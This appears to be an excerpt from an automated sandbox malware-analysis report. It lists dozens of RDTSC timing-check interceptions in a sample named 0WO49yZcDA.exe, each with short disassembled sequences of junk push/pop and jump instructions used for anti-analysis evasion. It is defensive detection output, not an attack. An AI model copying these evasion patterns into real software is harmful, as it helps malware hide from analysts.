                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11A1B96 second address: 11A1BA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11A1BA3 second address: 11A1BA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11A1BA7 second address: 11A1BC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F65CD2EDF00h 0x0000000c jmp 00007F65CD2EDEF4h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11A25BE second address: 11A25D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jg 00007F65CC527C9Eh 0x0000000b jnl 00007F65CC527C96h 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11A2760 second address: 11A2766 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11A2A24 second address: 11A2A2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11A2A2A second address: 11A2A30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11A7F88 second address: 11A7F8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11A8797 second address: 11A87A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F65CD2EDEE6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11A8939 second address: 11A893D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11A893D second address: 11A8954 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11A8A9D second address: 11A8AA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11A8AA8 second address: 11A8ADE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007F65CD2EDEE8h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 pop edx 0x00000015 jmp 00007F65CD2EDEF3h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11A8DA3 second address: 11A8DA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11A919C second address: 11A91A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11AADE2 second address: 11AAE03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F65CC527C96h 0x0000000a pop esi 0x0000000b jmp 00007F65CC527CA6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11AC3E2 second address: 11AC3F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65CD2EDEEAh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 117DA20 second address: 117DA25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 117DB9F second address: 117DBA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 117E298 second address: 117E2C2 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F65CC527C9Ch 0x00000008 jl 00007F65CC527C96h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007F65CC527C9Fh 0x00000019 jnl 00007F65CC527C96h 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 117E447 second address: 117E44B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 117E44B second address: 117E454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11AFC09 second address: 11AFC24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65CD2EDEF7h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11AFC24 second address: 11AFC30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11AFEC6 second address: 11AFECA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11B01C6 second address: 11B01CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11B01CD second address: 11B01D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11B5BB5 second address: 11B5BBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11B5BBE second address: 11B5BC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11B5BC2 second address: 11B5BC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11B5BC8 second address: 11B5BCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11B5F21 second address: 11B5F31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F65CC527C96h 0x0000000a popad 0x0000000b popad 0x0000000c push ecx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11B5F31 second address: 11B5F37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11B61B9 second address: 11B61C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11B5895 second address: 11B58B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F65CD2EDEF4h 0x0000000b pushad 0x0000000c jns 00007F65CD2EDEE6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11B58B8 second address: 11B58BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11B58BE second address: 11B58C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11B6625 second address: 11B662B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11B662B second address: 11B6631 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11B68D9 second address: 11B68DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11B68DD second address: 11B68E7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F65CD2EDEE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11B68E7 second address: 11B68FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 jno 00007F65CC527C96h 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11B68FD second address: 11B6901 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11B6901 second address: 11B6905 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11B6905 second address: 11B690E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11B99E4 second address: 11B9A27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527CA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F65CC527CA8h 0x00000010 jmp 00007F65CC527CA4h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11B9A27 second address: 11B9A3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F65CD2EDEE6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11B9A3D second address: 11B9A41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1131112 second address: 113112C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F65CD2EDEE6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnp 00007F65CD2EDEEEh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11BCE9F second address: 11BCED4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F65CC527CA3h 0x0000000d jmp 00007F65CC527CA7h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11C1A92 second address: 11C1AA8 instructions: 0x00000000 rdtsc 0x00000002 js 00007F65CD2EDEE8h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jl 00007F65CD2EDEFAh 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11C1AA8 second address: 11C1AAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11C1AAC second address: 11C1AB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11C1C3A second address: 11C1C54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F65CC527CA1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11C1DF6 second address: 11C1E00 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F65CD2EDEECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11C1FB3 second address: 11C1FDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527C9Eh 0x00000007 jmp 00007F65CC527CA9h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11CC377 second address: 11CC37B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11CC37B second address: 11CC38E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 jnl 00007F65CC527CA9h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11397AC second address: 11397B6 instructions: 0x00000000 rdtsc 0x00000002 js 00007F65CD2EDEECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11CB955 second address: 11CB959 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11CBD7C second address: 11CBD98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEF5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11CBD98 second address: 11CBD9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11CBD9D second address: 11CBDA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11CBDA2 second address: 11CBDD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F65CC527CA9h 0x0000000d jp 00007F65CC527C96h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11CBDD1 second address: 11CBDD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11CBDD7 second address: 11CBE0B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F65CC527CA9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F65CC527CA3h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D1E68 second address: 11D1E6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D1E6E second address: 11D1E7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 je 00007F65CC527C96h 0x0000000b pop esi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D1E7A second address: 11D1EA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F65CD2EDEE6h 0x00000009 jmp 00007F65CD2EDEF5h 0x0000000e jl 00007F65CD2EDEE6h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11D1EA3 second address: 11D1EA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11D1EA7 second address: 11D1EAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11D0774 second address: 11D07B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527CA8h 0x00000007 jns 00007F65CC527C96h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jc 00007F65CC527C9Ah 0x00000015 push edi 0x00000016 pop edi 0x00000017 pushad 0x00000018 popad 0x00000019 js 00007F65CC527C9Ah 0x0000001f push edx 0x00000020 pop edx 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 push esi 0x00000024 jng 00007F65CC527C96h 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11D0940 second address: 11D0944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11D0D43 second address: 11D0D4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F65CC527C96h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11D0D4D second address: 11D0D58 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11D0D58 second address: 11D0D6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65CC527C9Dh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11D0D6E second address: 11D0D74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11D0D74 second address: 11D0D78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11D0EBA second address: 11D0EBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 117DFA2 second address: 117E027 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F65CC527CA6h 0x00000008 jmp 00007F65CC527CA5h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push esi 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push esi 0x00000016 pop esi 0x00000017 popad 0x00000018 pop esi 0x00000019 nop 0x0000001a jnl 00007F65CC527CA1h 0x00000020 jmp 00007F65CC527C9Bh 0x00000025 adc cl, FFFFFFCCh 0x00000028 push 00000004h 0x0000002a push 00000000h 0x0000002c push edx 0x0000002d call 00007F65CC527C98h 0x00000032 pop edx 0x00000033 mov dword ptr [esp+04h], edx 0x00000037 add dword ptr [esp+04h], 0000001Dh 0x0000003f inc edx 0x00000040 push edx 0x00000041 ret 0x00000042 pop edx 0x00000043 ret 0x00000044 push eax 0x00000045 jo 00007F65CC527CA2h 0x0000004b jbe 00007F65CC527C9Ch 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11D106C second address: 11D1072 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11D1072 second address: 11D1079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11D954B second address: 11D9555 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11D760E second address: 11D7622 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jl 00007F65CC527C96h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e ja 00007F65CC527C96h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11D774A second address: 11D775B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F65CD2EDEECh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11D775B second address: 11D776C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F65CC527C96h 0x00000009 jnl 00007F65CC527C96h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11D776C second address: 11D7776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11D7A41 second address: 11D7A47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11D7A47 second address: 11D7A50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11D7A50 second address: 11D7A56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11D7A56 second address: 11D7A88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65CD2EDEF1h 0x00000009 jmp 00007F65CD2EDEF2h 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jnl 00007F65CD2EDEE6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11D7A88 second address: 11D7AB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527CA7h 0x00000007 jnl 00007F65CC527C96h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe RDTSC instruction interceptor: First address: 11D7AB3 second address: 11D7AB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
